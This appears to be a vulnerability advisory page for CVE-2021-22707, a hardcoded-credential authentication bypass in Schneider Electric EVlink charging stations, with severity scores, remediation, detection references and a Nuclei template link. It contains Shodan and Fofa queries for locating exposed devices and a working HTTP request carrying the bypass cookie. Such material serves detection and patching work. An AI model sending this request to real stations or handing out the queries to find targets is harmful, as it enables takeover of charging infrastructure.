🔙 목록으로 돌아가기

CVE-2021-22707: EVlink City < R8 V3.4.0.1 - Authentication Bypass

TitleEVlink City < R8 V3.4.0.1 - Authentication Bypass
Authorritikchaddha,dorkerdevil
SeverityCritical
ImpactUnauthenticated attackers can bypass authentication via hardcoded credentials and issue unauthorized administrative commands to the charging station web server, potentially disrupting charging operations or stealing sensitive data.
RemediationUpgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability.
CVSS Score9.8
EPSS Score0.91573
CVE IDCVE-2021-22707
CWE IDCWE-798
Shodan Querytitle:"EVSE web interface"http.title:"evse web interface"
Fofa Querytitle="EVSE web interface"title="evse web interface"
Tags cve2021 cve evlink auth-bypass schneider-electric vkev vuln

🔍 Vulnerability Description

A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.

🌐 HTTP Request

GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-22707.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-22707.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A